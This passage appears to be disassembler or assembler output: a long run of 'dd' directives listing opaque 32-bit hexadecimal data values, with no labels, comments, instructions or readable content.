0D888A850h, 0A33943F5h dd 0E1E71AC1h, 0D18922F2h, 0E838B616h, 6C409183h, 39F255Eh dd 7479B327h, 75B8A6B6h, 6CC8784Fh, 50E041EEh, 0EE042846h dd 0D6DD39C9h, 96C5A64h, 24E591BEh, 94B51D4Ah, 18C93EC6h dd 0F9AF5AEAh, 5542BB4Ah, 0CD363255h, 4D048F20h, 0FB8C0F1Dh dd 30B5BE76h, 0F8618DC2h, 0C7F8E6A4h, 0AC22189Fh, 0D5BFA92Eh dd 0C474BC74h, 4AE2061Ch, 0F2FA1F65h, 78690EAEh, 43F492E3h dd 5491F72Dh, 236BCE0Eh, 705E84DBh, 67729172h, 78971033h dd 0BB98AABAh, 4E6EBB21h, 3491B212h, 0FB7E5052h, 122EBEB4h dd 88A44A91h, 2ECEC2F8h, 0B65ED349h, 0CC69CACAh, 7883928Ah dd 1434D7AAh, 7BC99F75h, 2AF9E350h, 0D5A04EB1h, 0B86380h dd 0DA9B05F2h, 0AD249E89h, 0B03EC9DFh, 6400A242h, 0E8282730h dd 720905D9h, 45C06E90h, 4B905B12h, 0C02CF209h, 731A8F95h dd 15B88E2Eh, 78BED9Fh, 0E6BE0379h, 0D2571ABAh, 0E1C85A4Fh dd 9B5322F2h, 0F8168083h, 4AD9D53Ah, 1970BE60h, 8B6BC942h dd 0F8D2ECA6h, 7CB63AA0h, 168BE84h, 0F244612h, 5848ACF2h dd 48E74630h, 68C62C81h, 94B466FDh, 0C2301FF5h, 1103A515h dd 30358F9Bh, 0F5153032h, 2FD1906h, 2F8C7A44h, 0BB73CE5Ah dd 0EC8C2A3Dh, 38CA1AE6h, 0BC12110Ah, 4040FF2Eh, 0C4648252h dd 48880676h, 0CC850E9Ah, 50D00EBEh, 87A2C3E2h, 662A83F9h dd 85979A3Ah, 15A09AE2h, 276A4089h, 71D5B31Bh, 139EAAAAh dd 60CEA44Bh, 0B8913B02h, 90382664h, 0FC5CBA5Ch, 0EBEF5122h dd 76F4B2E7h, 0E4A130DFh, 5A89ADBFh, 0F565229Fh, 0EB64D263h dd 886664D3h, 4CF9536Ah, 63A04ECCh, 57A5A0EEh, 0C58928B3h dd 4E438E9Fh, 0C4530B74h, 4002AE31h, 0CC1B1335h, 48EF968Ah dd 0AEA512DCh, 219641D2h, 8E6DF297h, 0D496673h, 0B522CD3Eh dd 12116603h, 95FDFAEFh, 35CC6ACBh, 0E0A1F9A0h, 56150B1h dd 9A78C362h, 1F294955h, 0B370EF2Dh, 0F557F0h, 95DDE4C3h dd 28B94EA5h, 6165CC86h, 0F6674276h, 6D3CA753h, 0E91E220Eh dd 5390AA1Fh, 0E0D537D0h, 77B782A3h, 0F0993286h, 7312ED7Eh dd 0D734035Ch, 281C893Eh, 0D8E5123Fh, 55C286CAh, 0F2D416A3h dd 6C9D9A8Fh, 0E8791763h, 3339AD41h, 9009E726h, 48ED6B1Fh dd 0A9C9F8DCh, 22B267F2h, 0D48DE083h, 1E6C7341h, 9D59F643h dd 9126A3Ah, 81F0D710h, 2FA867E5h, 858ADEDFh, 19A34BB2h dd 0B314D778h, 117E4243h, 9508DF26h, 0C7805B03h, 6BE9B6F7h dd 0EDA433D2h, 6882AB92h, 90512B92h, 4040B765h, 0DE283B23h dd 5219B603h, 0E1C533EFh, 50A1A5B2h, 0D8850382h, 44788BAAh dd 0D5776E5Fh, 4631A436h, 0D6171F15h, 48F9BD8Ah, 0B3B21BF8h dd 18A6DBBh, 8F08C78Eh, 237A7E7Fh, 0B53DFB52h, 3B127C2Bh dd 0ACF9FBF4h, 1DD275C3h, 818FD2CEh, 66D6E96h, 915AC764h dd 0D012A7Bh, 9519F82Eh, 32F27DF5h, 0F8DDDACFh, 12B94A85h dd 656CD7A8h, 0F454235Fh, 492FA85Fh, 0E91C055Ah, 7FE29E10h dd 0E7C737C1h, 77AA86C6h, 0EF8F3F89h, 4966EC3Dh, 0A4301140h dd 4B079406h, 9FFF191Fh, 48D5A0ACh, 0D18772B6h, 5491B092h dd 0C8683B6Fh, 3522975Ch, 8517E726h, 3CED5576h, 0A9C0E3DCh dd 35BD67EAh, 0B198C1E2h, 0B186663h, 0B948E953h, 0D094A23h dd 0A2EBF617h, 3CCD4AFFh, 0ECA9C7D3h, 119D408Bh, 917DE472h dd 3E5E7951h, 0FC39D623h, 0F4F25738h, 45C8A3E7h, 0EBA72ADAh dd 659E9DDAh, 0F9562B8Ah, 5A34B74Eh, 0F23C1732h, 4C08A91Fh dd 0C9D637FCh, 41A387DEh, 0C38732A5h, 620C849Fh, 0D5422D6Ah dd 72318623h, 0B81D1A0Fh, 4EDF8EC4h, 0A5B41FCBh, 278B7082h dd 0C87BF593h, 3E6F7E54h, 0B524EF5Bh, 371B6032h, 9DEBE5E3h dd 28F21AD2h, 8185EC8Dh, 1574786h, 8741D275h, 18022A54h dd 9115DC1Dh, 7C157F6h, 8AE8C4C3h, 0FB959A5h, 744EBE9Dh dd 0D254235Fh, 473FA35Fh, 0EF09193Ch, 7EFFA70Ah, 0DBC01CA2h dd 5EB6B3B6h, 9C993683h, 506FAA40h, 0D6140C57h, 5B0D8539h dd 0C7E33E09h, 7EB080FBh, 0D1A43DB6h, 5B9DA588h, 0D273137Eh dd 1034B02Eh, 0A110ED20h, 21DE7215h, 0ADD9FEE8h, 3DB543D2h dd 0D48DE08Dh, 2D496248h, 9545E84Fh, 120F7820h, 8DF0C31Fh dd 7FC48F9h, 0ECA2CFD1h, 2A75A90h, 0A271C66Bh, 0D4C444Fh dd 9911D62Bh, 0F9F25103h, 68D09092h, 0EBA128E3h, 5F89AEB5h dd 0FE793C8Ah, 555B8645h, 0CB312528h, 7215A81Eh, 0F3F75EE9h dd 45B0B1F3h, 0D89D12A4h, 436089FAh, 0DF430B6Dh, 40319921h dd 0D6171566h, 48FF9FE4h, 0B4A519AEh, 30976DBAh, 0A966FF94h dd 3E2C6F77h, 0D026ED5Bh, 301A7711h, 0BBF7E586h, 5CC87FC1h dd 8594F087h, 10614C80h, 9B47CA55h, 22D625Fh, 0F015C23Ah dd 11E05CCBh, 8CDDD8D4h, 3FA85F8Dh, 656ED081h, 0E0413671h dd 7C29B265h, 0E2254A3Fh, 7EE2AB0Ah, 0E4FB26C7h, 1899B8A3h dd 0F98834A3h, 5445B07Ch, 0CA21127Dh, 69049403h, 0D8E2237Ah dd 55DE9CFBh, 0D5B120B6h dd 5491B082h, 0F85D7A6Fh, 910BF78h, 804AB061h, 1A884A3Ah dd 0A0EFEDFFh, 1BB57DD1h, 86F4EB87h, 28577163h, 0B977F44Fh dd 21185B37h, 83E1F072h, 1ACD53C7h, 80ADFCC3h, 8B54BABh dd 9146B243h, 0C5D6541h, 8930DB1Ch, 0C1F87B0Bh, 0F2979492h dd 0DE9E44DCh, 0D861E51h, 8862B1ACh, 44A12D74h, 13584604h dd 4A2A8CAEh, 0D05F08DEh, 9A511DAAh, 2BE876E8h, 0EE52FA3Eh dd 0F9BD6E16h, 659CD9B9h, 0B878760Eh, 18D07762h, 0AAC014ADh dd 17B453D7h, 483839Ch, 1CF8814Ah, 8110E46Ah, 0C18B4130h dd 0D888A860h, 0A3B0DE29h, 0F0DE705Bh, 6CC0A1F2h, 1CBD2BD5h dd 5F4C3A07h, 0A270C497h, 469402EAh, 0A97C3DA6h, 2C9C509Bh dd 8318D4BFh, 0EE704AD2h, 9DB79638h, 8C7C74B8h, 23B00AFDh dd 9B74D770h, 0C22F145Fh, 5F3E79B2h, 0C8DFED59h, 5BBB9DF3h dd 28CD6259h, 0C4DC6A7Ah, 30B09C72h, 0B4BEA649h, 78923A6Dh dd 0AC1C7A62h, 1242942Eh, 280C8238h, 22880604h, 9CFFDB9Ah dd 6E069B41h, 8DAB92F2h, 663E83F9h, 23B99A3Ah, 0EDEB6F3Ah dd 0E494B7FAh, 0FD252A75h, 0ECDCBABAh, 23A7FFDDh, 719F60FDh dd 782808E4h, 0D48635C7h, 0AB683E6Eh, 8F5B3D6Dh, 98F69C33h dd 2B6347DAh, 78104ED7h, 0EBCB2D38h, 0A69ED3CDh, 93F1DA7Ah dd 0A0A077A0h, 0DB3BEB5Ah, 626DED29h, 0A90CFAC4h, 3D101ADEh dd 347DC9CDh, 468C9E66h, 0B9170575h, 0C0D0407Ch, 4F90C257h dd 0E140097Bh, 93C40A1Ah, 5BAF71C0h, 1B74DA5h, 0D898966Eh dd 0B13D47AAh, 0E0F085D2h, 0E189EBC1h, 0E838B8B1h, 3D1D7E6Bh dd 0F21FF0Eh, 64AA6017h, 0DCBC31A6h, 42FAAF35h, 0C25DBEFEh dd 6C714216h, 848C636h, 0C781CB07h, 7A90DE65h, 8221DF5Dh dd 48D8C6DDh, 0B8DC97B8h, 0A320F40Eh, 63226EF6h, 3873BAD3h dd 6BACA77Ah, 20ABB01Bh, 9ED456C2h, 523BABE6h, 0B5F42210h dd 0CD40FE2Eh, 3ACEE310h, 8B7873BFh, 0F3EC1FF3h, 0D4D50EAEh dd 5DB69AEAh, 48275693h, 1FDE6D2Ah, 6060F61Bh, 65D9A272h dd 78B3837Bh, 0A85121BAh, 0F3F03EE1h, 0F41C967Eh, 7881B229h dd 10DDBA4Ah, 80803C66h, 5A0AAC6h, 1D3746B6h, 0CFCF4A0h dd 149DB275h, 1435D606h, 98320646h, 1C7CDE82h, 0F2F2088Eh dd 0B13BB5B2h, 0A8F858A0h, 0BB8123C9h, 0B0306F1Ah, 363EA313h dd 0D0791C37h, 7C9CFA8Ah, 825581FCh, 0D2E412ECh, 937C7073h dd 48445E4Ah, 87508E3Fh, 7450A69Dh, 27989684h, 4C83383Fh dd 2065C7CEh, 70E73486h, 82FC2D46h, 3B1D783Ah, 4AE55108h dd 2D9422BCh, 28CD7623h, 5A49C59Ch, 8D00AED0h, 0D3760645h dd 8510825Ch, 8C6D4ECDh, 0D0A3657Eh, 67ED42C8h, 4888866Dh dd 0CCAC0ABAh, 6AB5215Ch, 2544720Ch, 286AEE92h, 88F8957Ah dd 22251196h, 0E7D462FDh, 7EA6319h, 7E417A1Ah, 7EC0FE2Ah dd 8265F758h, 5D0C8BFDh, 0D54F8A8Ah, 40D09B33h, 5F792F2h dd 0DCCAE950h, 0C3B495EAh, 6F601E4Fh, 0E485B2F6h, 5296A696h dd 6C8ABACFh, 0F4FF2EE0h, 0F414B303h, 0D1808A6h, 0C2DDFCBBh dd 0C7CE773Eh, 0CB2F80E7h, 0C7C90070h, 66BD04F1h, 0C3461FFEh dd 2B3E47DDh, 0A3015656h, 0C3F9D5ABh, 2DA05E8Eh, 34DA7937h dd 0C0E80CD6h, 2C0CEAF6h, 25CF3D4Eh, 3444CD48h, 0B8787A5Bh dd 8319F58Ah, 29C07EAEh, 44E40263h, 9A58B877h, 0C9235C53h dd 0D0508E9Bh, 0F87CD4E1h, 5C979BBAh, 5CBC1A33h, 1395BEF2h dd 6B3E1E5Eh, 0E8282A93h, 4C41873Ah, 0CD508E7Eh, 0F155A3h dd 0C414C9D3h, 0FDA04FEAh, 68204190h, 0F5513666h, 784BB8B7h dd 0F9436560h, 0EFD70816h, 2E855DA2h, 18D8F1D6h, 63AEB81Dh dd 301E749Bh, 0F4845132h, 0C038B606h, 0AC8C6A73h, 5EC781DAh dd 0D0B51DAEh, 226D09E6h, 391C6A35h, 73768AEEh, 80E10B9Bh dd 19881649h, 0CCAE8AF2h, 6815F3Eh, 0CA616DB2h, 0D5180639h dd 0CC2705BFh, 0A9534E4Eh, 0B6D4F326h, 0FD5777C7h, 0ECDC94E8h dd 8FD42A59h, 0E42A9497h, 0F8FBCE26h, 0EC49CDC7h, 43793F6Eh dd 5CEC3F8h, 0FB377549h, 89F935DEh, 0A34A3A3Eh, 0A7E459F9h dd 0A408554Dh, 1BF6FE7h, 1A2B5E9Eh, 24C4E3BEh, 0A9E0EC5Dh dd 0D40FEAFAh, 3B50A535h, 55F20189h, 5A3F7312h, 0BFB2117Fh dd 4B937169h, 906F551Eh, 8862D2A6h, 0B346584Bh, 0EEB61BC1h dd 0D9FF1272h, 0D888A8DCh, 77B0DE29h, 0E7091D01h, 646E2535h dd 0A7A1A6FEh, 231FE939h, 0B127FA18h, 39C877D0h, 97CAD5CFh dd 8BA55B9h, 6E69E9B2h, 0F7532D76h, 7A3D856Ah, 0F8022F28h dd 63E2AB28h, 0C8DA3DCBh, 74A8AE83h, 0EE992885h, 52418A0Eh dd 0EC300755h, 281C9539h, 0FC8C6A78h, 30B0EE9Eh, 0CCBB00B2h dd 51D69B8Fh, 0DD7B1978h, 39389F42h, 0C408F27Ch, 3CB4F38h dd 0A8C6E6BAh, 23B868DAh, 87A19888h, 2B384443h, 9275D560h dd 916386Eh, 0EEF1D600h, 68A8CEC3h, 6D91AABAh, 60EE8333h dd 83917402h, 78382633h, 0C2222FB5h, 68413E7Eh, 6E98B68Dh dd 0BE7DCDA8h, 55ECDAE4h, 0E53E7252h, 2AB5B408h, 0BB2D4BB9h dd 234667E7h, 0D62B5E9Eh, 4261B5B0h, 186DEB73h, 0A30CFAC2h dd 0A008B89Bh, 72DD0842h, 4636FA9Ch, 0DE9D4B71h, 28909561h dd 0BB1BF9F3h, 0C02CFA75h, 0A4687F1Eh, 0D0508E36h, 7A375431h dd 0D8D4DAC2h, 62368F55h, 20EB9EDEh, 0E972F86h, 7DD7F514h dd 6C5C1408h, 18E37EA1h, 8B6BCC15h, 0F8B8BD4Eh, 3F9A69CAh dd 2E53F1B1h, 84680E56h, 36C253C9h, 0F0844A4Ah, 0F86F3180h dd 6B4BA4A2h, 0A045B39h, 55CF5AFAh, 62C85B83h, 0F5156222h dd 7938B707h, 39733B2Bh, 30A0D018h, 0B4D4792Ah, 7DABA3E6h dd 922E4958h, 400CB26Ah, 0FAEE17ADh, 42600666h, 0BBAC8A9Ah dd 39A27ECDh, 9592E68Ch, 0CDE74606h, 0DC2CA418h, 5E5A9BC7h dd 0D58BA262h, 71D5AB1Bh, 6945AAAAh, 70E0119Eh, 7E814D53h dd 0EB382618h, 0FC5CBE22h, 0A35B36Eh, 5DA4D28Bh, 0B7EEFB3Bh dd 0CE04CACAh, 0F6EFB10Bh, 0A5957E5h, 0C8585656h, 2137FE9h dd 2DA05E9Eh, 34DACF27h, 0C2BC36D6h, 7E0C80FBh, 0B0306C76h dd 1EC10DC2h, 3D786659h, 1EE9A04Ah, 0DEA0F323h, 2EB602C2h dd 0A5BD0BF0h, 182C1A04h, 8100DE68h, 7AE1ED30h, 809886B9h dd 639A8F55h, 65269EDEh, 641463B5h, 0E8244E16h, 3F1B2A3Ah dd 0C33BED11h, 38D01CB0h, 6D47B6EAh, 7CCC0440h, 7D67Dh dd 31A94212h, 858DED7h, 7AD1C703h, 0F890DE40h, 6B4BA79Fh dd 18D8DA2Eh, 0D2B50DEAh, 74659047h, 0E808261Ch, 0A2FD1956h dd 298C7A44h, 534E15Eh, 27D472C0h, 38F8F38Eh, 0A3A9F70Ah dd 1940EE37h, 0FB763FDFh, 4E600666h, 4F53756Fh, 40EF1803h dd 50FB92E2h, 58181416h, 0DDAC76ABh, 8341E4Eh, 0E484A373h dd 565EB369h, 284DAAAAh, 70F02F4Eh, 9EC03952h, 0EDC76426h dd 0FC4C855Ch, 0F5D9FEEBh, 172CAA9Fh, 1D3746B6h, 0CFCF470h dd 2D93AC15h, 1424CC4Dh, 15712346h, 0C62A9EFh, 355F0E8Eh dd 24D4DDB0h, 2CE7A653h, 2C0CEB73h, 3B3C2E95h, 0BB640D42h dd 0A86619E3h, 7B193C8Ah, 0C1C06EEFh, 458E02B8h, 5DF7849Ch dd 4C3C3514h, 0DFAF76BDh, 547572E6h, 4D150586h, 5CAC04C1h dd 0B3B28EA4h, 5AFAB70Dh, 28ADA606h, 6D0CAF35h, 4DFDAE5Eh dd 74842C0Eh, 0C450BE17h, 1423C530h, 0BE7Ah, 0DC2694Ch dd 0F71CE202h, 9C52C8CFh, 8A2D437Eh, 25B442BCh, 0E2C53EC7h dd 971A515h, 2030C089h, 0B02C6258h, 7A68E656h, 0A6199529h dd 0BDB0FEA1h, 39C05686h dd 28BA1E73h, 0A132A0Ah, 64047524h, 0CC844346h, 5A894C74h dd 86BE88D0h, 749405BDh, 0DB1512EAh, 910F6C7h, 0CC18DE21h dd 0ED302CB1h, 0F4BBEACFh, 68B4CE96h, 0C2E9AABAh, 5ED056E8h dd 0CE349C22h, 561D1303h, 8479C272h, 8AF31B4Eh, 4AED8DD8h dd 779F4696h, 1CD2F04Fh, 3CD4CFFEh, 7E34D222h, 0CB0F0646h dd 23764F95h, 2D2B5E9Eh, 24D4F722h, 0B30B66BCh, 7D012391h dd 0B0306BF6h, 5071D442h, 472F766Ch, 2CA2C01Fh, 0CC04FDAEh dd 2CEFE982h, 0C80886F1h, 528CB797h, 83078E2Eh, 6B7E879Dh dd 181D9696h, 0E9314ED4h, 0E0F0A186h, 71948771h, 6528A606h dd 7C0D6DB7h, 9ABE855Eh, 27C26382h, 0C7BE2359h, 845F3ADAh dd 912FC0EEh, 31A9BC99h, 858F97Eh, 229E47EAh, 0F8F0DE0Bh dd 6B4BA888h, 0FBCFA4A7h, 9D8BD7E3h, 0EFAB34E5h, 19C9AC19h dd 2878D91Eh, 5B0BCE89h, 0CFE35775h, 0A4EA8857h, 4F4576E6h dd 0BD1C6A1Fh, 7028D45Ah, 3B648227h, 58B6ACE3h, 8B110A9Ah dd 50D01EFFh, 51338396h, 58080869h, 0DC3C9A2Ah, 21279B88h dd 0D84A262h, 9757D89Eh, 0F94C2F7Dh, 70F02ECEh, 36493202h dd 72353622h, 93329A05h, 0EFA05001h, 6DC8E2F4h, 0A8E923D0h dd 6598EA95h, 0E4302B93h, 7157F24Dh, 0EA3A332Ah, 3D19AE0Bh dd 80805483h, 6BE4C292h, 0C59D15F6h, 0C7E8F97h, 0D4420F79h dd 39759C27h, 0D41D246Ch, 50E894EFh, 0ACB30DCBh, 258C22ABh dd 0E871F686h, 6C48647Bh, 0B520F65Bh, 3A156601h, 0ABB8BAF2h dd 38D27BDEh, 0DA87F0A7h, 6E090FD2h, 8B5CC741h, 0B224352h dd 9C1CCF7Eh, 0DF556A2h, 9CD6D786h, 1BB554EAh, 202CCA86h dd 0A4562D74h, 6D21B450h, 0AC1F2E34h, 71E7EE37h, 998E26CBh dd 7DB081CCh, 0FDDC3F98h, 5900BB7Ch, 8468175Dh, 4D019430h dd 93FF0E14h, 5DDFADBEh, 0FDF453A7h, 4B91D692h, 0D1750E2Ah dd 960DF4Bh, 0E417A526h, 2DFC671Ah, 6E0D22BBh, 5D5BBF2h dd 72E0BB8Ah, 36E19616h, 4591DD4Ah, 0C6740D2Ch, 0B80D4562h dd 4647AEEh, 46033178h, 87A5A721h, 0CFF40AFFh, 0C08B64A4h dd 0FC5CBA92h, 80803E6Eh, 4A4C292h, 88C846B6h, 0CECCADAh dd 90104EFEh, 1434D222h, 98585646h, 1C7CDA6Ah, 0A0A05E8Eh dd 24C4E2B2h, 0A8E866D6h, 2C0CEAFAh, 0B0306E1Eh, 3454F242h dd 0B8787666h, 3C9CFA8Ah, 0C0C07EAEh, 44E402D2h, 0C80886F6h dd 0E9AF6A1Ah, 0D040CC86h, 0E8D19162h, 0D89886C4h, 48FFADA5h dd 0EFF8CD43h, 67026945h, 0CC6C2DC6h, 600E011Eh, 0B24BB72Ch dd 0FF80418Ah, 0BA93A2E4h, 0C449B3C6h, 8900AEACh, 9466FE97h dd 8B4D2D36h, 558E6298h, 10940C1Fh, 0B0EBD72Ah, 7C30D6D6h dd 0F4FC5AEAh, 2020DE2Eh, 87C8E7BFh, 1131E646h, 2F801E62h dd 0C752EA5Eh, 0F640F73Dh, 0CF3BF6F6h, 0E39179D3h, 0A340EE0Ah dd 38147D42h, 0A00B06F9h, 455A689Eh, 40F38223h, 0D4CE11E2h dd 6A331372h, 512CE829h, 3B38E200h, 0E4BE212Ch, 5A5722E2h dd 9E33A951h, 8FA7C6CEh, 3A3F4DFDh, 3A84BB0Dh, 0FF04BA5Ah dd 0F430A25h, 14E65A17h, 1C4D81B6h, 0CECDA98h, 78104EFEh dd 1434D21Eh, 0DACCD3CDh, 0B594DA7Ah, 485FA178h, 24C4E2AAh dd 0EA7CDB55h, 590CEAEAh, 0B8ADE716h, 0DF54E266h, 2CF589FAh dd 0FF9CEAC8h, 8258FB21h, 0D16D02C2h, 0C818C462h, 4C2C09F2h dd 1399BD3Eh, 54F481E9h, 30CA9686h, 0A343E447h, 0A25C0BCDh dd 0B20722E2h, 0E824DC95h, 6D4BAE35h, 8AF3AE5Eh, 0F09B3292h dd 0F8B8B65Bh, 2CD07841h, 0FFFE7606h, 38A141EDh, 0B48D674h dd 84E61A9Ch, 649037FEh, 0BA4DD2BBh, 0F398D5B2h, 9DB4D11Bh dd 0FFFF3F8Fh, 5DC5BDEDh, 2824AA12h, 87D5860Fh, 0CA496D56h dd 0B463FDCDh, 0B99EF6E6h, 8E2F8472h, 40EB7B21h, 47328252h dd 4DFD064Ch, 27BCC011h, 53DA85BCh, 0A61CC313h, 5BE7E9F8h dd 0CC7E269Fh, 0A0E5B34Eh, 608B590Ah, 68A82612h, 0AE701F45h dd 98A02ECEh, 0BEB4C57h, 3A84B325h, 79D3BA5Ah, 80907CD2h dd 5780C691h, 0BBCA8635h, 45AC501h, 59905C1Dh, 30F58102h dd 84715262h, 3870F34Eh, 494B1ED5h, 0F3CB1933h, 969CBB6Dh dd 69A4117Bh, 8644B570h, 0F0D09C3h, 960C89C7h, 1E4A010Bh dd 0E6B4D21Bh, 0AD77F953h, 0D67C75AEh, 0A551F19Bh, 0C6247D66h dd 6B32E9E3h, 0D6EC77A3h, 638CE12Bh, 0E6947FEBh, 269CB70Dh dd 173A606h, 93B3D54Bh, 0E4B22D00h, 8B6ADD6Bh, 92B97559h dd 353462CEh, 88FF411Bh, 94027B87h, 39F0A036h, 4C8E4842h dd 0F292CD9Ah, 92DEF9C4h, 0EDF63E9Eh, 5E7FA515h, 4AF15906h dd 85AC3A37h, 0A89719A3h, 0A7FF6980h, 0B5B2BE2Eh, 0B4C454FBh dd 52DF1D4Ch, 3CB62262h, 5835FDD4h, 0C58C93E2h, 0F077F983h dd 0CCAC8A9Bh, 5DA4DC3Ah, 1E0A7233h, 5DF3E0EDh, 0DC3C9A92h dd 0DF82B5CEh, 74112FB1h, 43A836AFh, 2F165D6Dh, 4974AB29h dd 0F414B212h, 0ED373E26h, 0F7BC7B8Ah, 0B902BB98h, 71A5C282h dd 1C520B0h, 0FAFF21FFh, 8029CC7Bh, 1241D022h, 0BD695B20h dd 111ADE81h, 0BC67B8Fh, 0DB3B5E5Ah, 9CABED29h, 6EA07F73h dd 739B6E0Eh, 0DD077B5h, 0B8787676h, 0A993F28Ah, 6A7C7A6Eh dd 0BB1B9E3Ah, 789D0F09h, 0BA2C1A58h, 0C0690CBBh, 50011362h dd 0DA73A789h, 9F17DA81h, 0D9641B39h, 640422E2h, 0CF5CAE16h dd 5532AFB0h, 10B1AE4Eh, 0FF995489h, 4813D0E3h, 0F9569032h dd 108790h, 813FA2D3h, 0EC1A251h, 0EAAC79F1h, 0A88225D5h dd 94B1DDC6h, 665D5C6Dh, 98FC4AD3h, 38C01F56h, 2182A199h dd 2878C1C2h, 1CA98173h, 56900562h, 0D2D4997Ah, 52E11D4Dh dd 0B5F4220Eh, 0CDBF01DAh, 24A55056h, 0C18D607Eh, 2707EC5Ah dd 0FA40BEBDh, 3CAC8788h, 0A7E7E5F6h, 0FBA81FAAh, 0E0661E5Eh dd 0CBF7AA88h, 0ABDCF412h, 2FB86044h, 0B784E420h, 2D6078FCh dd 744CFCD8h, 0F32870B4h, 8FF4F490h, 0CF4F3B22h, 3862C106h dd 0BC282101h, 20D0A50Bh, 0D78839DAh, 0A1DCD3B1h, 3C7CDA7Ah dd 26105E8Eh, 20C0E0C7h, 2216295Bh, 3C35965Fh, 309B081Eh dd 3321F7BEh, 0F7F876D6h, 0D436BA75h, 3F3F81CCh, 7D608725h dd 880886E6h, 0F44A0A1Ah, 0D225BF58h, 0FF123BD6h, 5D928E36h dd 5CAC23D4h, 4AE37E0Eh, 9BFB1F1Ah, 1FA016E9h, 7C75AEBFh dd 0F0F0AE5Eh, 0C4964782h, 841D3C20h, 1ADC2AF3h, 5FC3E45h dd 84944567h, 48B789B6h, 31E189F0h, 1080F7EEh, 6B4B5F4Ah dd 9C5D2139h, 9CFC4AD3h, 5430DE0Eh, 0E24D231h, 11EC63A1h dd 0AC8C6A6Ah, 37C4E69Eh, 585F277Ah, 0CFB75DE6h, 0AC25FE8Fh dd 4040FD2Eh, 34E08D53h, 0F8880676h, 45072072h, 40929203h dd 2A387AE2h, 0B0A8E9F9h, 61B53180h, 60705CEEh, 1B7A1F9Ah dd 0EC2DD169h, 0EFCCBA83h, 4F02EDEh, 70914518h, 7838261Fh dd 885DBA4Ah, 7EAED664h, 9F4C3D6Dh, 3837B948h, 87476033h dd 8052D27Bh, 3FFB5922h, 3CE5DF8Eh, 957CCA28h, 0C718A2C6h dd 8FF21DD6h, 38EA6E5h, 15886F0Dh, 0B0336E0Eh, 2720F242h dd 81FAF390h, 481CFA9Ah, 3D6A96A4h, 1F0CFD2Dh, 70F77908h dd 6AA56E7Dh, 0B690BD95h, 0D0F1E5C9h, 0DB9886BFh, 28BC1AAAh dd 62656894h, 0E40432CBh, 69C0AC63h, 84B3D5C7h, 0F8F506Ch dd 8B69306Ah, 10980659h, 8323C1DEh, 0B866870Dh, 2F4257EDh dd 9DC36DA7h, 8C7C73DEh, 0D2671C89h, 94B452A1h, 0C430C2B3h dd 2C03A516h, 0DACE3611h, 1C229DCDh, 830EF3A9h, 6307C1EBh dd 72146B15h, 7CFF72D2h dd 0CF04BE6Fh, 0AC25FE8Fh, 4040FD2Eh, 335CF652h, 58B182F3h dd 0CCAC8A9Ah, 0A7FC7AB8h, 0C4CD1667h, 58181606h, 3436EF2Bh dd 9F9FE38Ch, 1B79E99Ah, 0EC2DD169h, 0ECCCBA83h, 4F42EDEh dd 9B85A08h, 19D0C9D9h, 0BA345B7h, 90B9BAEBh, 4A4C692h dd 60DF32B6h, 0F313374Ch, 6ED06746h, 1C8C79EAh, 335C2286h dd 0F784AFD2h, 0DF48F5E9h, 0D33B1D4Fh, 0B8D1E253h, 2C0CE2FAh dd 30421B1Eh, 246D70FFh, 0D10C7666h, 0C3619F62h, 0D8E9C651h dd 0E1EECBFBh, 0C818BF88h, 462FEEDAh, 0C069F09Bh, 1F9CB962h dd 6867697Bh, 0D936B01Bh, 0E0F0A74Ch, 9938CA58h, 5E2759E9h dd 7C7554BFh, 3074235Eh, 94557286h, 9E3506AEh, 0D6DD8A61h dd 0FD2056B9h, 0B80DBDEDh, 0EAF0A012h, 99B13A1h, 1080F7FAh dd 94B452B2h, 5168D1B2h, 0E9443C40h, 46C1DCF4h, 58B88A99h dd 0C0D819A9h, 74C59D0h, 72385317h, 312372D2h, 38E8CF62h dd 0BC1C7A2Ah, 0A817E95Bh, 3B9B7E8Ch, 0F8478D2Ch, 0C666A1C2h dd 40E9723Bh, 28BE1BE2h, 0A4D0FEACh, 645A65D5h, 0E597DECFh dd 0E4949BF6h, 68A826D6h, 284CA9CEh, 0C5524F6h, 9214A23Bh dd 0F485BF8Dh, 575CAA08h, 0B904BB99h, 4A4C282h, 81BD06B6h dd 89EE9A6Ah, 90007782h, 90B12588h, 1858467Fh, 697CDA6Ah dd 0AA18EE85h, 34FD9F37h, 9503CCD6h, 343D529Ch, 89B4EBE9h dd 3554F252h, 0BA0C7666h, 9996D33Ah, 0C0D047D3h, 4EE7E612h dd 0D831FB53h, 2A876C1Ah, 27A00F86h, 444D96E7h, 0D89A9686h dd 0E8BE6FAAh, 9D459406h, 20432CBh, 40952FBDh, 0D44C3A78h dd 0F07087CEh, 0F011C529h, 0F0B8A69Fh, 8DC3ACAh, 0FC20569Fh dd 1D3BDEDh, 858FFB2h, 8C6C4E5Ah, 0A820C50Bh, 0ADCAD7A8h dd 0F372D6D6h, 1879ADA7h, 2020CE37h, 0D144623Ah, 0ABD08047h dd 0D229609Ah, 56B0FEA7h, 1E144169h, 809EE30Dh, 19166223h dd 4050C750h, 0CE676692h, 58B178D3h, 3B07EC9Ah, 40E98A3Bh dd 0D4E492E2h, 0D9A07006h, 5C3FEEEAh, 0C56A168Ah, 0E4949B0Ch dd 0DEA78DF0h, 0FCF5283Fh, 0DF1885DEh, 3EB4DF9h, 6801B2A3h dd 0FC5CBA4Ah, 308E4A2Eh, 7821C0C2h, 22C8568Fh, 0F3175F32h dd 6E5FC301h, 56A45FABh, 1DAF5656h, 1C6CE3EEh, 20A05E8Eh dd 0CC74EEC6h, 1561CD7Ch, 2C1CA84Eh, 51D86BF5h, 0DCAB0DB9h dd 47878D0Ch, 5187F7Dh, 0C0C07EBEh, 4F9102D3h, 4D02C646h dd 4C3C3366h, 0B65F6594h, 5EB491DAh, 0C8A1EA23h, 0EC177CAAh dd 651734CFh, 64141B76h, 0E82AA616h, 0E9BB054Fh, 0F06097DAh dd 74903282h, 3808ACD3h, 45A2BFC0h, 0A58ABEFEh, 84347B91h dd 6E5826F7h, 27ED2CE2h, 187BCECEh, 11BE1212h, 18C8EFB8h dd 1879AD40h, 2020CE37h, 0D1446A32h, 0ABD08046h, 0D1296092h dd 56B0FEA7h, 5FD5C269h, 32B046EEh, 0AC25078Fh, 9FA8542Eh dd 339B7DA8h, 58B182F3h, 0DCAC8A9Ah, 25A5BFBEh, 574CF4C7h dd 25BD1CFEh, 0BA3C8A13h, 0CAA02DE5h, 0A6141F5Bh, 0ED5F2686h dd 0ECDC933Eh, 70D02EDEh, 83A5AD77h, 0C05E2DCDh, 5956A243h dd 80900713h, 0EA72652h, 98F13B13h, 2547ACDAh, 8052DE43h dd 